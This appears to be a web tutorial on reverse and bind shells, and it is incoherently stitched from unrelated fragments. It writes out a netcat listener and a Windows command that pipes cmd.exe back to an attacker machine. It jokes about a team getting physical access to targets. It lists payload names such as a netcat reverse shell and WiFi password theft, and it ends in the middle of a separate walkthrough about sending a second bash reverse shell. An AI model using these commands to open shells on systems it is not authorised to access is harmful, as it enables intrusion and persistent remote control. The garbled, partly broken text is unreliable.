Reverse shells are useful for issuing commands to a remote client when the client is behind something such as a NAT. You might say, 'But can't a normal shell or simple SSH tunnel do the same thing?' No, it can't. All over the internet I see a lot of confusion regarding the difference between a normal shell and a reverse shell. Let's clear this up before we get started.Reverse Shell. A reverse shell works by the remote computer sending its shell to a specific user, rather than binding it to a port, which would be unreachable in many circumstances. This allows root commands over the remote server.Bind Shell.
A bind shell is when a user uses BASH and binds a shell to a local port that anyone can issue commands to on the local network.Reverse shells are also commonly used for nefarious purposes, like after a hacker roots a server, they will likely make a reverse shell so they have easy access to the computer for future use. Let's take a look at a few ways we could make one on an example remote computer. I trust it is one that you haven't used. I hooked a remote windows PC (which I had access to).Make the listener on my attacker PC.#nc -lv -p 80 (Port 80 was already open for my webserver to use and I specified the target IP so no other IP could connect.)Then pipe the cmd.exe from the target (windows) PC which I had physical access to.C:NetCatnc -v 80 -e cmd.exeWorked fine. The issue for the hacker is getting physical access to the target machine, but we have the scorpion team to do that for us;-)'. I however could assist my mother in law with her Windows issue without having to face her.
Payload Netcat Bind Shell; Payload netcat FTP download and reverse shell; Payload Netcat Reverse Shell; Payload OSX Ascii Prank; Payload OSX Change Wallpaper; Payload OSX Copy A File or Directory from a Known Location To USB Mass Storage; Payload Windows 10: Shutdown Prank; Payloads; PC Audit; Restart Prank; SEXY GANDALF; Steal info & pass WiFi. As you can see, I started this new listener on port 7331, as 1337 is still in use with our currently connected reverse shell. Now, we need to send another reverse shell command through the Netcat shell we already have! We’ll use the same bash command we used to get the initial shell, just with the port updated to 7331.